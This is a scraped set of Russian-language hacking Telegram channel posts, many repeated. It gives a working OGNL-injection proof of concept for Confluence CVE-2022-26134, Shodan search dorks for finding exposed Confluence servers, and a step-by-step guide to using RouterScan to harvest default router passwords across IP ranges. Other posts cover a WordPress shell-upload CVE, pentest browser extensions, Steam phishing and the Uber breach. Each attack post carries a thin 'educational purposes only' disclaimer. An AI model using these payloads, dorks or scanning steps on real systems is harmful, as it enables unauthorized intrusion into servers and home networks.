УЯЗВИМОСТЬ, КОТОРАЯ ЗАСТАВИЛА АВТОРА ОБОСРАТЬСЯ
Знакомьтесь, CVE-2020-35489, уязвимость в плагине Contact Form 7 в WordPress версии раньше 5.3.2 позволяет залить шелл с помощью обхода расширения файла и в последствии доступа к нему через папку wp-content/uploads... Скрипт-кидди автор, радуясь залитому на веб-сервис шеллу, тут же познал горечь поражения, потому что тупо не смог найти куда залился этот файл🤓
Статья
#cve #wordpress
Знакомьтесь, CVE-2020-35489, уязвимость в плагине Contact Form 7 в WordPress версии раньше 5.3.2 позволяет залить шелл с помощью обхода расширения файла и в последствии доступа к нему через папку wp-content/uploads... Скрипт-кидди автор, радуясь залитому на веб-сервис шеллу, тут же познал горечь поражения, потому что тупо не смог найти куда залился этот файл🤓
Статья
#cve #wordpress
😁4
ЕЩЕ ПРОЩЕМ ЧЕМ ЗИМБРА
Эксплуатация Confluence RCE: CVE-2022-26134
—Уязвимость позволяет вызвать РСЕ без аутентификации на Confluence следующих версий:
from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
—Дорки для поиска в шодане через CLI:
Nuclei Template
—PoC (не забудь URL-энкодить символы перед отправкой):
http://example.com/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
—Статья:
Статья
—Эксплоит на гитхабе:
Эксплоит 1
Эксплоит 2
—Только в образовательных целях.
#cve
Эксплуатация Confluence RCE: CVE-2022-26134
—Уязвимость позволяет вызвать РСЕ без аутентификации на Confluence следующих версий:
from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
—Дорки для поиска в шодане через CLI:
shodan search 'http.favicon.hash:-305179312' --fields ip_str,port—Nuclei темплейт сразу вызывает РСЕ, потому не придется пользоваться сторонними эксплоитами:
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500
shodan search 'http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500
shodan search 'http.component:"atlassian confluence" http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500
shodan search 'http.favicon.hash:-305179312 200' --fields ip_str,port --limit 500
Nuclei Template
—PoC (не забудь URL-энкодить символы перед отправкой):
http://example.com/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
—Статья:
Статья
—Эксплоит на гитхабе:
Эксплоит 1
Эксплоит 2
—Только в образовательных целях.
#cve
👍3
Forwarded from SHADOW:Group
🦊 Подборка браузерных расширений для Bug Bounty и пентеста
Некоторые расширения для браузера, которые помогают находить ошибки безопасности во время просмотра страницы.
▫️ KNOXSS для XSS
Расширение предназначено для поиска XSS уязвимостей, когда мы просматриваем веб-сайт. Доступно в двух версиях: бесплатная Community Edition и платная Pro версия.
▫️ Wappalyzer
Определяет CMS, JS-библиотеки, фреймворки и другие технологии, используемые на сайте. Это поможет вам сосредоточить процесс разведки на определенной технологии и ее версии.
▫️ Hackbar
Содержит полезные нагрузки для XSS-атак, SQL-инъекций, обхода WAF, LFI и т. д.
▫️ DotGit
Расширение для проверки наличия
▫️ ModHeader
Помогает легко изменять заголовки HTTP-запросов и ответов в браузере.
▫️ Beautifier & Minify
Приводит в читабельный вид CSS, HTML и JavaScript код.
▫️ Retire.js
Отображает наличие уязвимих библиотек JavaScript. Это помогает найти известные уязвимости в JS и некоторые CVE, влияющие на сайты с уязвимой JS библиотекой.
▫️ Email Extractor
Автоматически сохраняет адреса электронной почты с веб-страниц, которые мы посещаем. Помогает при проведении атак социальной инженерии, брутфорс атак и т. д.
▫️ TruffleHog Chrome Extension
Сканирует посещаемые веб-сайты в поисках API ключей и учетных данных и уведомляет вас, если они будут найдены.
▫️ Fake Filler
Цель этого расширения — упростить и ускорить тестирование заполняемых форм разработчиками и тестировщиками. Помогает заполнить все формы ввода (текстовые поля, области, раскрывающиеся списки и т. д.) поддельными и случайно сгенерированными данными.
▫️ Cookie Editor
Позволяет изменять, удалять, добавлять значения cookie для различных целей тестирования. Можно протестировать на ошибки контроля доступа, повышение привилегий и т. д.
#web
Некоторые расширения для браузера, которые помогают находить ошибки безопасности во время просмотра страницы.
▫️ KNOXSS для XSS
Расширение предназначено для поиска XSS уязвимостей, когда мы просматриваем веб-сайт. Доступно в двух версиях: бесплатная Community Edition и платная Pro версия.
▫️ Wappalyzer
Определяет CMS, JS-библиотеки, фреймворки и другие технологии, используемые на сайте. Это поможет вам сосредоточить процесс разведки на определенной технологии и ее версии.
▫️ Hackbar
Содержит полезные нагрузки для XSS-атак, SQL-инъекций, обхода WAF, LFI и т. д.
▫️ DotGit
Расширение для проверки наличия
.git на посещаемых веб-сайтах. Также проверяет открытые файлы .env, security.txt и многое другое.▫️ ModHeader
Помогает легко изменять заголовки HTTP-запросов и ответов в браузере.
▫️ Beautifier & Minify
Приводит в читабельный вид CSS, HTML и JavaScript код.
▫️ Retire.js
Отображает наличие уязвимих библиотек JavaScript. Это помогает найти известные уязвимости в JS и некоторые CVE, влияющие на сайты с уязвимой JS библиотекой.
▫️ Email Extractor
Автоматически сохраняет адреса электронной почты с веб-страниц, которые мы посещаем. Помогает при проведении атак социальной инженерии, брутфорс атак и т. д.
▫️ TruffleHog Chrome Extension
Сканирует посещаемые веб-сайты в поисках API ключей и учетных данных и уведомляет вас, если они будут найдены.
▫️ Fake Filler
Цель этого расширения — упростить и ускорить тестирование заполняемых форм разработчиками и тестировщиками. Помогает заполнить все формы ввода (текстовые поля, области, раскрывающиеся списки и т. д.) поддельными и случайно сгенерированными данными.
▫️ Cookie Editor
Позволяет изменять, удалять, добавлять значения cookie для различных целей тестирования. Можно протестировать на ошибки контроля доступа, повышение привилегий и т. д.
#web
👍2
ВЗЛОМ ЖОПЫ
Применяем RouterScan by Stas'M на деле
—Описание от автора:
Router Scan умеет находить и определять различные устройства из большого числа известных роутеров/маршрутизаторов и, что самое главное, - вытаскивать из них полезную информацию, в частности характеристики беспроводной сети: способ защиты точки доступа (шифрование), имя точки доступа (SSID) и ключ точки доступа (парольная фраза). Также получает информацию о WAN соединении (удобно при сканировании локальной сети) и выводит марку и модель роутера. Получение информации происходит по двум возможным путям: программа попытается подобрать пару логин/пароль к маршрутизатору из списка стандартных паролей, в результате чего получит доступ. Либо будут использованы неразрушающие уязвимости (или баги) для конкретной модели маршрутизатора, позволяющие получить необходимую информацию и/или обойти процесс авторизации.
—Короче:
Мы даем приложению список или диапазон IP-адресов и он проверяет их версию, наличие дефолтных паролей или уязвимостей.
—Список IP-адресов для каждой страны можно подсмотреть здесь, но предпочтительнее собрать через шодан.
—Как пользоваться:
Вбиваем наш список в раздел "Enter IP ranges to scan", тыкаем на "Start Scan" и смотрим раздел "Good Results". Во вкладке будет показана вся интересующая нас информация. В столбике Authorization будут показаны пароли, которые позволят нам без проблем зайти на админ панель.
—Только в образовательных целях.
#wifi
Применяем RouterScan by Stas'M на деле
—Описание от автора:
Router Scan умеет находить и определять различные устройства из большого числа известных роутеров/маршрутизаторов и, что самое главное, - вытаскивать из них полезную информацию, в частности характеристики беспроводной сети: способ защиты точки доступа (шифрование), имя точки доступа (SSID) и ключ точки доступа (парольная фраза). Также получает информацию о WAN соединении (удобно при сканировании локальной сети) и выводит марку и модель роутера. Получение информации происходит по двум возможным путям: программа попытается подобрать пару логин/пароль к маршрутизатору из списка стандартных паролей, в результате чего получит доступ. Либо будут использованы неразрушающие уязвимости (или баги) для конкретной модели маршрутизатора, позволяющие получить необходимую информацию и/или обойти процесс авторизации.
—Короче:
Мы даем приложению список или диапазон IP-адресов и он проверяет их версию, наличие дефолтных паролей или уязвимостей.
—Список IP-адресов для каждой страны можно подсмотреть здесь, но предпочтительнее собрать через шодан.
—Как пользоваться:
Вбиваем наш список в раздел "Enter IP ranges to scan", тыкаем на "Start Scan" и смотрим раздел "Good Results". Во вкладке будет показана вся интересующая нас информация. В столбике Authorization будут показаны пароли, которые позволят нам без проблем зайти на админ панель.
—Только в образовательных целях.
#wifi
👍1👎1😱1
Forwarded from SHADOW:Group
🎣 Кража данных Steam с помощью техники Browser-in-the-Browser
Помните, в марте я рассказывал про новый метод фишинга, под названием Browser In The Browser (BITB)? Оказывается некоторые хакеры активно взяли его на вооружение и используют для кражи аккаунтов Steam.
В тематических чатах в телеграме и дискорде рассылаются ссылки на бесплатные скины или приглашения в команды для участия в турнирах LoL, CS, Dota 2 или PUBG. При переходе по ссылке открывается фишинговый сайт, который при попытке входа имитирует вызов всплывающего окна от Steam для аутентификации пользователей. Жертва думает, что входит через Steam и отдает свои данные злоумышленникам.
Более подробно вы можете ознакомиться в статье по ссылке.
#redteam #phishing
Помните, в марте я рассказывал про новый метод фишинга, под названием Browser In The Browser (BITB)? Оказывается некоторые хакеры активно взяли его на вооружение и используют для кражи аккаунтов Steam.
В тематических чатах в телеграме и дискорде рассылаются ссылки на бесплатные скины или приглашения в команды для участия в турнирах LoL, CS, Dota 2 или PUBG. При переходе по ссылке открывается фишинговый сайт, который при попытке входа имитирует вызов всплывающего окна от Steam для аутентификации пользователей. Жертва думает, что входит через Steam и отдает свои данные злоумышленникам.
Более подробно вы можете ознакомиться в статье по ссылке.
#redteam #phishing
🤔3
Forwarded from SecAtor
Uber сообщил о взломе инфраструктуры и начале официального расследования с участием спецслужб и правоохранителей.
Инцидент сразу же попал в заголовки мировых СМИ. Однако, если вы читали наш канал, мы уже предполагали такое развитие событий, буквально пару дней назад.
В результате атаки компания вынуждена была отключить свои внутренние коммуникации и инженерные системы для установления масштабов происшествия и минимизации дальнейшего ущерба.
Об атаке стало известно, когда злоумышленник взломал учетную запись Slack сотрудника и использовал ее для оповещения, в котором упоминается утечка данных, а также прилагаются скрин со списком скомпрометированных баз данных.
Uber пока не раскрывает дополнительных подробностей, но похоже, что хакер, предположительно 18-летний подросток, притворившись корпоративным ИТ-специалистом, с помощью социальной инженерии увел у сотрудника пароль, который использовал для закрепления во внутренней сети.
По данным ресерчеров Acronis, внутри контура злоумышленники отыскали в одной из общих сетевых папок учетные данные с высоким уровнем привилегий, которые обеспечили им доступ ко многим критически важным ИТ-системам Uber, включая производственные системы, корпоративную консоль EDR, контроллер домена Windows и интерфейс управления Uber slack.
Крое того, хакер смог добраться и до консоли Amazon Web Services, виртуальным машинам VMware ESXi, панели администратора электронной почты Google Workspace.
А, со слов ресерчера Сэма Карри Yuga Labs, утечка также затрагивает сведения Uber по программе HackerOne со всеми отчетами об ошибках, в том числе уязвимостях, которые еще не устранены.
Случившееся уже впервые в Uber. Крупная утечка данных произошла в 2016 году и затронула 57 млн. пассажиров и водителей. В конечном итоге Uber выплатил хакерам 100 000 долларов за сокрытие утечки.
Правда, выплата выкупа не помогла замять инцидент, в конце 2017 года информация просочилась, а руководитель службы безопасности Джо Салливан был осужден за сокрытие информации о преступлении и воспрепятстование расследованию.
Текущая ситуация произошла как раз в момент передачи уголовного дела против Салливана в Окружной суд США в Сан-Франциско.
Будем следить за ситуацией.
Инцидент сразу же попал в заголовки мировых СМИ. Однако, если вы читали наш канал, мы уже предполагали такое развитие событий, буквально пару дней назад.
В результате атаки компания вынуждена была отключить свои внутренние коммуникации и инженерные системы для установления масштабов происшествия и минимизации дальнейшего ущерба.
Об атаке стало известно, когда злоумышленник взломал учетную запись Slack сотрудника и использовал ее для оповещения, в котором упоминается утечка данных, а также прилагаются скрин со списком скомпрометированных баз данных.
Uber пока не раскрывает дополнительных подробностей, но похоже, что хакер, предположительно 18-летний подросток, притворившись корпоративным ИТ-специалистом, с помощью социальной инженерии увел у сотрудника пароль, который использовал для закрепления во внутренней сети.
По данным ресерчеров Acronis, внутри контура злоумышленники отыскали в одной из общих сетевых папок учетные данные с высоким уровнем привилегий, которые обеспечили им доступ ко многим критически важным ИТ-системам Uber, включая производственные системы, корпоративную консоль EDR, контроллер домена Windows и интерфейс управления Uber slack.
Крое того, хакер смог добраться и до консоли Amazon Web Services, виртуальным машинам VMware ESXi, панели администратора электронной почты Google Workspace.
А, со слов ресерчера Сэма Карри Yuga Labs, утечка также затрагивает сведения Uber по программе HackerOne со всеми отчетами об ошибках, в том числе уязвимостях, которые еще не устранены.
Случившееся уже впервые в Uber. Крупная утечка данных произошла в 2016 году и затронула 57 млн. пассажиров и водителей. В конечном итоге Uber выплатил хакерам 100 000 долларов за сокрытие утечки.
Правда, выплата выкупа не помогла замять инцидент, в конце 2017 года информация просочилась, а руководитель службы безопасности Джо Салливан был осужден за сокрытие информации о преступлении и воспрепятстование расследованию.
Текущая ситуация произошла как раз в момент передачи уголовного дела против Салливана в Окружной суд США в Сан-Франциско.
Будем следить за ситуацией.
Twitter
We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available.
Forwarded from Geek Hacker
Скриншоты взломанных систем Uber, опубликованные хакером: Финансовые данные, админка корпоративного гугла, админка серверов AWS и vSphere
@geekhackers
@geekhackers
Гайд по amass от hakluke
https://hakluke.medium.com/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7
https://hakluke.medium.com/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7
Medium
Hakluke’s Guide to Amass — How to Use Amass More Effectively for Bug Bounties
Amass has a lot of features. It’s a bit of a weird tool because despite being synonymous with bug bounty recon, and despite being…